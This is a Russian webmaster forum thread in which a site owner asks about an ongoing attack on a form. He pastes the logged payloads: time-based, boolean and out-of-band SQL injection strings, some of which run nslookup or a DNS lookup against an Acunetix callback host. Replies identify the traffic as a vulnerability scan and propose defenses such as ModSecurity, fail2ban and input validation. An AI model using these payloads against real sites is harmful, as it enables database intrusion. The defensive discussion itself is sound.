Атака на сайт с передачей через форму разного рода непонятных параметров? Чем это сулит?

123 4
V
На сайте с 10.01.2012
Offline
85
3189

Приветствую, уважаемые гуру...

Сегодня на сайт началась атака и уже порядка 7 часов не прекращается...

Посредством обработчика одной из форм идут попытки записать в БД какую-то гадость посредством передачи POST запросом в значениях формы.

Периодически меняется идентификатор формы, в который подставляются данные. Ниже скину по очереди несколько значений которые подряд идут при каждой новой попытке. Подскажите, какая может быть цель у этих иродов исходя из кода, который пытаются передать через форму.


if(now()=sysdate(),sleep(420),0)/*\'XOR(if(now()=sysdate(),sleep(420),0))OR\'"XOR(if(now()=sysdate(),sleep(420),0))OR"*/
(select(0)from(select(sleep(420)))v)/*\'+(select(0)from(select(sleep(420)))v)+\'"+(select(0)from(select(sleep(420)))v)+"*/
-1; waitfor delay \'0:0:420\' --
-1); waitfor delay \'0:0:420\' --
1 waitfor delay \'0:0:420\' --
aUgtJ1Jh\'; waitfor delay \'0:0:140\' --
-1;select pg_sleep(140); --
-1);select pg_sleep(140); --
-1));select pg_sleep(140); --
NiwVY2Ly\';select pg_sleep(140); --
UCWUfdRh\');select pg_sleep(140); --
Zpn3BjsT\'));select pg_sleep(280); --
1||UTL_INADDR.get_host_address(\'dns.\'||\'sqli.013405.986-17533.986.f76fb.1.bxss\'||\'.me\')
\'||UTL_INADDR.get_host_address(\'dns.\'||\'sqli.013405.986-17534.986.f76fb.1.bxss\'||\'.me\')||\'
1;copy (select \'\') to program \'nslookup dns.sqli.\\013405.986-17535.986.f76fb.\\1.bxss.me\'
1\';copy (select \'\') to program \'nslookup dns.sqli.\\013405.986-17536.986.f76fb.\\1.bxss.me
836\'
1
1
-1 OR 2+306-306-1=0+0+0+1 --
-1 OR 2+46-46-1=0+0+0+1
-1\' OR 2+946-946-1=0+0+0+1 --
-1\' OR 2+246-246-1=0+0+0+1 or \'jM2wJpwt\'=\'
-1" OR 2+826-826-1=0+0+0+1 --

И того - 24 запроса в которых код по очереди как выше (каждая строка - код с последующей заявки) и далее по новой...

Что это за зверь не подскажите?

foxi
На сайте с 02.03.2011
Offline
877
#1

Ищут уязвимости на вашем сайте.

Антибот защита для сайта (https://antibot.cloud/ru.html#searchengines) (защита от кражи контента и спама) | ВебМастерские микроблоги (https://wmsn.biz/#searchengines) | Фокси SEO форум (https://foxi.biz/#searchengines)
V
На сайте с 10.01.2012
Offline
85
#2

Ну это понятно как таково...

Если я правильно понимаю - это попытки найти дыры в PostgreSQL...

Меня смутил урл ___bxss.me. При переходе на него редиректит на сайт acunetix - AcuMonitor: Detecting XXE, Blind XSS, and SSRF Attacks.

---------- Добавлено 11.10.2019 в 16:32 ----------

И собственно основной вопрос - как можно обезопасить себя от подобного?

По сути с этой атакой проблема решена банально просто - айпишник с которого шло занес в блеклист и все. Но все же...

A
На сайте с 20.08.2010
Offline
775
#3

Это не поможет? http://networker.by/blokirovka-post-zaprosov-v-htaccess/

Была тема с post-запросами в 2013 году, спасались тогда блокировкой.

suffix
На сайте с 26.08.2010
Offline
261
#4

Поставить ModSecurity (как модуль Apache или nginx), затем в fail2ban настроить правило [modsecurity] - шаблон там уже есть и спать спокойно !

Клуб любителей хрюш (https://www.babai.ru)
foxi
На сайте с 02.03.2011
Offline
877
#5

Антибот из моей подписи помогает в таких ситуациях.

Vladimir
На сайте с 07.06.2004
Offline
322
#6
Varenik:

И собственно основной вопрос - как можно обезопасить себя от подобного...

Что у вас за программист? Это, же азы, не допускать до обработчика всякую хрень.

- Заполняется это в любом случае програмно, то вначале проверка на бота ( не капча )

- Проверка полей формы и преобразование данных, до передачи обработчику

Аэройога ( https://vk.com/aeroyogadom ) Йога в гамаках ( https://vk.com/aero_yoga ) Аэройога обучение ( https://aeroyoga.ru ) и просто фото ( https://weandworld.com )
S
На сайте с 30.09.2016
Offline
459
#7
Nadejda:
Проверка полей формы и преобразование данных, до передачи обработчику

Глупости писать не надо.

Отпилю лишнее, прикручу нужное, выправлю кривое. Вытравлю вредителей.
Vladimir
На сайте с 07.06.2004
Offline
322
#8
Sitealert:
Глупости писать не надо.

Это у вас глупости, вам пришли данные на обработчик, проверьте их, и exit, если они нафиг не нужны

И, на бота, там же проверяется. Если умеете, только капчей проверять, то просто не умеете готовить (программить)

PS На десятках сайтах, ни капчи, ни спама, ни такой херни. И обработчики "самописом" писались лет 15 назад

S
На сайте с 30.09.2016
Offline
459
#9
Nadejda:
Это у вас глупости

Глупости – у тех кто их пишет, я глупостей не писал.

Не можешь внятно выразить свои мысли – лучше вообще ничего не пиши, чтобы у людей от такой писанины голова не пухла.

Nadejda:
пришли данные на обработчик, проверьте их
Так пришли или не пришли?
Nadejda:
Если умеете, только капчей проверять, то просто не умеете готовить (программить)

Кто здесь вообще что-то про капчу говорил? Тема вообще про другое.

Nadejda:
На десятках сайтах, ни капчи, ни спама, ни такой херни. И обработчики "самописом" писались лет 15 назад
Это великое достижение? Типо похвастаться надо?
Vladimir
На сайте с 07.06.2004
Offline
322
#10
Sitealert:
Так пришли или не пришли?

Пришли они или нет, придут или нет, у вас в любом случае должна быть проверка на входящие данные, и если вы этого не понимете, то какой из вас программист?

Пользоваться готовыми обработчиками, в которых даже не знаете, что проверяется, а что нет?

---------- Добавлено 13.10.2019 в 13:47 ----------

Sitealert:

Кто здесь вообще что-то про капчу говорил?

А, то что она у всех, и на 90 % не работает. А, проверив только на бота....на 90%, сработает exit, без дальнейшей проверки всех входящих данных

---------- Добавлено 13.10.2019 в 13:59 ----------

Varenik:
айпишник с которого шло занес в блеклист и все. Но все же...

Вы, умеете пользоваться прокси? Ну, бывает школота балуется с одного, но в основном Ip меняется, и уповать на блеклист не стоит.

123 4

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий